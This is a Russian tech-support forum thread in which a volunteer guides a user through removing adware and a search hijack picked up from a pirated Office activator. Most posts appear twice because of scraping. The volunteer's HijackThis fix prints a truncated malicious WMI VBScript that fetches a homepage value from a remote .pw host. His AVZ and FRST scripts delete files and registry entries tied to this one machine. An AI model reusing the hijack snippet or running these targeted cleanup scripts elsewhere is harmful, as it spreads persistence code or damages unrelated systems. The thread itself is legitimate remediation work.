Реклама в браузере и принудительная переадресация на поиск mail.ru

@Анастасия2405 · Регистрация: 31.05.2015

Author24 — интернет-сервис помощи студентам

Искала в интернете способы активации офиса, скачала утилиту, был запущен exe файл, установивший множество гадостей: китайский антивирус, множество ярлыков на сайты браузерных игр, игровой центр mail.ru и вирус, который открывает рекламу в текущем окне браузера во время его запуска и с периодичностью в несколько минут запускает дополнительное окно с рекламными ресурсами и делает это же почти через каждое нажатие на что-либо в окне браузера (работает во всех браузерах). К тому же он принудительно перенаправляет запросы поисковой строки на поиск от mail (изначально в адресной строке идёт прогрузка поисковой системы yandex, но спустя волшебное мгновенье мы оказываемся на поиске от меила).

Помогите, пожалуйста. Читала на форумах, что нужно прилагать какой-то лог - не знаю что это, извините(

Добавлено через 20 минут
Половину сделала, как было написано вот здесь Реклама в браузере и принудительная переадресация на поиск mail.ru
Но у меня винда 7, а не 8. И при запуске ClearLNK проблема перехода на поиск мэил так и не исправилась. Несмотря на то , что он наше кучу угроз и удалил кучу фа

@Анастасия2405 · 16.11.2016, 00:47 **[ТС]**

Половину сделала, как было написано вот здесь Реклама в браузере и принудительная переадресация на поиск mail.ru
Но у меня винда 7, а не 8. И при запуске ClearLNK проблема перехода на поиск мэил так и не исправилась. Несмотря на то , что он наше кучу угроз и удалил кучу файлов и папок (отчет в формате ворд прилагается, в текстовом не загрузился - много весит)

@Анастасия2405 · 16.11.2016, 01:00 **[ТС]**

Научилась делать логи. Не такой уж я и чайник:3

@Анастасия2405 · 16.11.2016, 10:34 **[ТС]**

Забыла написать, что помимо мэил, на комп установились китайский браузер uc, китайкий архиватор и еще какая-то прога под названием AutoTime. При чем я их удалила через программы и удаления, но он почему-то не удалился, хотя из списка установленных программ исчез, попыталась вручную удалить папки - полностью не удаляет - пишет, что приложение используется, завершада процессы, но все равно не удалялось. CLEAR помог только с тем, что реклама вроде бы больше не всплывает. Не знаю как быть с остальным, уже все перепробовала, помогите кто-нибудь, пожалуйста...

@Sandor · 16.11.2016, 14:50

Здравствуйте!

Внимание! Рекомендации написаны специально для пользователя Анастасия2405. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
______________________________________________________

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

Код

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFileF('c:\program files (x86)\dpower', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Users\Настя\AppData\Local\Temp\new-super-ext.exe', '');
 QuarantineFile('C:\Program Files (x86)\DPower\B57SWZGP7E.exe', '');
 QuarantineFile('C:\Users\Настя\AppData\Local\Temp\TS78HLTYY\TS78HLTYY.exe', '');
 QuarantineFile('C:\Users\Настя\AppData\Local\Temp\5B35Y5FKW\5B35Y5FKW.exe', '');
 DeleteFile('C:\Users\Настя\AppData\Local\Temp\new-super-ext.exe', '32');
 DeleteFile('C:\Program Files (x86)\DPower\B57SWZGP7E.exe', '32');
 DeleteFile('C:\Users\Настя\AppData\Local\Temp\TS78HLTYY\TS78HLTYY.exe', '32');
 DeleteFile('C:\Users\Настя\AppData\Local\Temp\5B35Y5FKW\5B35Y5FKW.exe', '32');
 DeleteFileMask('c:\program files (x86)\dpower', '*', true);
 DeleteDirectory('c:\program files (x86)\dpower');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','001dae8c');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','46YR92KSV3');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','MX4EKZH4SC');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CLOGKR9XCG');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.

Компьютер перезагрузится.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью формы вверху этой темы или с помощью этой формы.
К сообщению прикреплять файл quarantine.zip не нужно!

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

Код

O25 - WMI Event: ASEC - EventFilter sethomePage2 - Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb(2626 bytes)

Подготовьте новый CollectionLog. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

@Анастасия2405 · 16.11.2016, 15:01 **[ТС]**

Через 2 часа будет, спасибо вам, что нашли время!

@Анастасия2405 · 16.11.2016, 16:40 **[ТС]**

Готово!

@Sandor · 16.11.2016, 16:47

1. Файл CheckBrowserLnk.log
из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.

2. Подготовьте и прикрепите лог сканирования AdwCleaner.

@Анастасия2405 · 16.11.2016, 16:52 **[ТС]**

Браузер еще и из-за этих вирусов так долго стал всё грузить(((

@Анастасия2405 · 16.11.2016, 17:00 **[ТС]**

Есть!

@Sandor · 16.11.2016, 17:07

1.

Запустите повторно AdwCleaner (by Malwarebytes) (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора).
Нажмите кнопку "Scan" ("Сканировать").
По окончании сканирования в меню Инструменты - Настройки отметьте дополнительно в разделе Сбросить:
- Политики IE
- Политики Chrome
  и нажмите Ok.
Нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления.
Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[Cx].txt.
Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

2.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.

@Анастасия2405 · 16.11.2016, 17:14 **[ТС]**

Если пишет как на фото во время очистки - это плохо?

@Sandor · 16.11.2016, 17:20

CHKDSK вероятно придется запустить, но давайте сначала закончим. Отчет AdwCleaner в итоге получился? Также сделайте п.2

@Анастасия2405 · 16.11.2016, 17:27 **[ТС]**

Не получается у меня теперь архивировать, из-за этого китайского вируса, который блокирует нормальный архиватор(( загрузила в ворде

@Sandor · 16.11.2016, 17:34

Отчет FRST.txt получился пустой. Переделайте, пожалуйста.

@Анастасия2405 · 16.11.2016, 17:38 **[ТС]**

переделала

@Sandor · 16.11.2016, 17:48

Создайте текстовый файл fixlist.txt в папке с Farbar Recovery Scan Tool.

Cкопируйте в него текст из окна "winbatch" ниже и сохраните.

Windows Batch file

start
CMD: wmic /Namespace:\\root\default Path SystemRestore Call Enable "%SystemDrive%"
CreateRestorePoint:
HKLM-x32\...\Run: [DailyBee] => C:\Users\Настя\AppData\Roaming\DailyBee\DailyBee.exe su
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\їмС№\X64\KZipShell.dll [2016-11-15] ()
FF NewTab: Mozilla\Firefox\Profiles\zly32jv2.default -> C:\\ProgramData\\Hotfreshs\\ff.NT
2016-11-16 17:14 - 2016-11-16 17:18 - 00000000 ____D C:\Users\Настя\AppData\Roaming\KuaiZip
2016-11-15 22:14 - 2016-11-15 22:14 - 00000000 ____D C:\Users\Настя\AppData\Local\UCBrowser
2016-11-15 22:13 - 2016-11-15 22:14 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2016-11-15 22:11 - 2016-11-15 22:47 - 00000000 ____D C:\Users\Настя\AppData\Roaming\Phuvighqerley
2016-11-15 22:11 - 2016-11-15 22:19 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-11-15 22:11 - 2016-11-15 22:15 - 00000000 ____D C:\Program Files (x86)\Kibalecefa
2016-11-15 22:11 - 2016-11-15 22:11 - 00006014 _____ C:\Windows\System32\Tasks\Ckucosp Core
2016-11-15 22:11 - 2016-11-15 22:11 - 00003270 _____ C:\Windows\System32\Tasks\psv_Medlight
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\Users\Настя\AppData\Local\Drajukderhety
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\Users\Все пользователи\Avira
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\Users\Все пользователи\Avg
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\Users\Все пользователи\AVAST Software
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\Users\Public\Thunder Network
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\ProgramData\Avira
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\ProgramData\Avg
2016-11-15 22:11 - 2016-11-15 22:11 - 00000000 ____D C:\ProgramData\AVAST Software
2016-11-15 22:10 - 2016-11-15 22:11 - 00000000 ____D C:\Users\Все пользователи\Hotfreshs
2016-11-15 22:10 - 2016-11-15 22:11 - 00000000 ____D C:\ProgramData\Hotfreshs
2016-11-15 22:10 - 2016-11-15 22:10 - 07299584 _____ C:\Users\Настя\AppData\Roaming\agent.dat
2016-11-15 22:10 - 2016-11-15 22:10 - 01904544 _____ C:\Users\Настя\AppData\Roaming\Medronlex.tst
2016-11-15 22:10 - 2016-11-15 22:10 - 01897571 _____ C:\Users\Настя\AppData\Roaming\Hotfan.bin
2016-11-15 22:10 - 2016-11-15 22:10 - 00126464 _____ C:\Users\Настя\AppData\Roaming\noah.dat
2016-11-15 22:10 - 2016-11-15 22:10 - 00070704 _____ C:\Users\Настя\AppData\Roaming\Config.xml
2016-11-15 22:10 - 2016-11-15 22:10 - 00018432 _____ C:\Users\Настя\AppData\Roaming\Main.dat
2016-11-15 22:10 - 2016-11-15 22:10 - 00005568 _____ C:\Users\Настя\AppData\Roaming\md.xml
2016-11-15 22:10 - 2016-11-15 22:10 - 00003292 _____ C:\Windows\System32\Tasks\psv_HotTone
2016-11-15 22:10 - 2016-11-15 22:10 - 00003268 _____ C:\Windows\System32\Tasks\psv_HotString
2016-11-15 22:09 - 2016-11-15 22:09 - 00190394 _____ C:\Users\Настя\AppData\Roaming\Warmtouch.bin
2016-11-15 22:09 - 2016-11-15 22:08 - 00692736 _____ C:\Users\Настя\AppData\Roaming\Medronlex.exe
2016-11-15 22:08 - 2016-11-15 22:09 - 00016272 _____ C:\Users\Настя\AppData\Roaming\InstallationConfiguration.xml
2016-11-15 22:08 - 2016-11-15 22:08 - 00140288 _____ C:\Users\Настя\AppData\Roaming\Installer.dat
2016-11-15 22:08 - 2016-11-15 22:08 - 00003294 _____ C:\Windows\System32\Tasks\PBot
Task: {A7C02FD8-4392-4023-8051-7AE2E3B0FE3B} - \Adobe Acrobat Update Task -> No File <==== ATTENTION
Task: {DCCEA4B6-44F2-4712-81D8-55BC3CF247F3} - System32\Tasks\PBot => C:\Users\Настя\AppData\Roaming\PBot\python\pythonw.exe [2016-11-08] ()
AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [80850]
AlternateDataStreams: C:\Windows\system32\drivers:x64 [1442146]
AlternateDataStreams: C:\Windows\system32\drivers:x86 [1156450]
FirewallRules: [{0B032716-4645-467A-8037-10B09A192DAF}] => (Allow) C:\Program Files\UBar\ubar.exe
FirewallRules: [{8DA6D0EF-41F8-488A-B98E-FD48632B7510}] => (Allow) C:\Users\Настя\AppData\Local\Amigo\Application\amigo.exe
EmptyTemp:
Reboot:
end

Отключите до перезагрузки антивирус, запустите FRST, нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Подробнее читайте в этом руководстве.

@Анастасия2405 · 16.11.2016, 17:58 **[ТС]**

готово

@Sandor · 16.11.2016, 17:59

Что с проблемой?

@Анастасия2405 · 16.11.2016, 18:02 **[ТС]**

Поисковик так и переклбчается на go mail (( программы архиватора и uc браузера китайкие не удалились (

@Анастасия2405 0 / 0 / 0 Регистрация: 31.05.2015 Сообщений: 26
		1
	Реклама в браузере и принудительная переадресация на поиск mail.ru 16.11.2016, 00:42. Показов 1571. Ответов 39 Метки нет (Все метки) Искала в интернете способы активации офиса, скачала утилиту, был запущен exe файл, установивший множество гадостей: китайский антивирус, множество ярлыков на сайты браузерных игр, игровой центр mail.ru и вирус, который открывает рекламу в текущем окне браузера во время его запуска и с периодичностью в несколько минут запускает дополнительное окно с рекламными ресурсами и делает это же почти через каждое нажатие на что-либо в окне браузера (работает во всех браузерах). К тому же он принудительно перенаправляет запросы поисковой строки на поиск от mail (изначально в адресной строке идёт прогрузка поисковой системы yandex, но спустя волшебное мгновенье мы оказываемся на поиске от меила). Помогите, пожалуйста. Читала на форумах, что нужно прилагать какой-то лог - не знаю что это, извините( Добавлено через 20 минут Половину сделала, как было написано вот здесь Реклама в браузере и принудительная переадресация на поиск mail.ru Но у меня винда 7, а не 8. И при запуске ClearLNK проблема перехода на поиск мэил так и не исправилась. Несмотря на то , что он наше кучу угроз и удалил кучу фа 0

@Анастасия2405 0 / 0 / 0 Регистрация: 31.05.2015 Сообщений: 26
	16.11.2016, 10:34 [ТС]	4
	Забыла написать, что помимо мэил, на комп установились китайский браузер uc, китайкий архиватор и еще какая-то прога под названием AutoTime. При чем я их удалила через программы и удаления, но он почему-то не удалился, хотя из списка установленных программ исчез, попыталась вручную удалить папки - полностью не удаляет - пишет, что приложение используется, завершада процессы, но все равно не удалялось. CLEAR помог только с тем, что реклама вроде бы больше не всплывает. Не знаю как быть с остальным, уже все перепробовала, помогите кто-нибудь, пожалуйста... 0

@Анастасия2405 0 / 0 / 0 Регистрация: 31.05.2015 Сообщений: 26
	16.11.2016, 15:01 [ТС]	6
	Через 2 часа будет, спасибо вам, что нашли время! 0

@Sandor 22286 / 15770 / 3048 Регистрация: 08.10.2012 Сообщений: 64,109
	16.11.2016, 16:47	8
	1. Файл CheckBrowserLnk.log из папки ...\AutoLogger\CheckBrowserLnk перетащите на утилиту ClearLNK. Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению. 2. Подготовьте и прикрепите лог сканирования AdwCleaner. 0

@Анастасия2405 0 / 0 / 0 Регистрация: 31.05.2015 Сообщений: 26
	16.11.2016, 16:52 [ТС]	9
	Браузер еще и из-за этих вирусов так долго стал всё грузить((( 0

@Sandor 22286 / 15770 / 3048 Регистрация: 08.10.2012 Сообщений: 64,109
	16.11.2016, 17:07	11
	1. Запустите повторно AdwCleaner (by Malwarebytes) (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора). Нажмите кнопку "Scan" ("Сканировать"). По окончании сканирования в меню Инструменты - Настройки отметьте дополнительно в разделе Сбросить: Политики IE Политики Chrome и нажмите Ok. Нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления. Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[Cx].txt. Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. 2. Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Отметьте галочкой также "Shortcut.txt". Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. (Если не помещаются, упакуйте). Подробнее читайте в этом руководстве. 0

@Анастасия2405 0 / 0 / 0 Регистрация: 31.05.2015 Сообщений: 26
	16.11.2016, 17:14 [ТС]	12
	Если пишет как на фото во время очистки - это плохо? Миниатюры 0

@Sandor 22286 / 15770 / 3048 Регистрация: 08.10.2012 Сообщений: 64,109
	16.11.2016, 17:20	13
	CHKDSK вероятно придется запустить, но давайте сначала закончим. Отчет AdwCleaner в итоге получился? Также сделайте п.2 0

@Sandor 22286 / 15770 / 3048 Регистрация: 08.10.2012 Сообщений: 64,109
	16.11.2016, 17:34	15
	Отчет FRST.txt получился пустой. Переделайте, пожалуйста. 0

@Sandor 22286 / 15770 / 3048 Регистрация: 08.10.2012 Сообщений: 64,109
	16.11.2016, 17:59	19
	Что с проблемой? 0

@Анастасия2405 0 / 0 / 0 Регистрация: 31.05.2015 Сообщений: 26
	16.11.2016, 18:02 [ТС]	20
	Поисковик так и переклбчается на go mail (( программы архиватора и uc браузера китайкие не удалились ( 0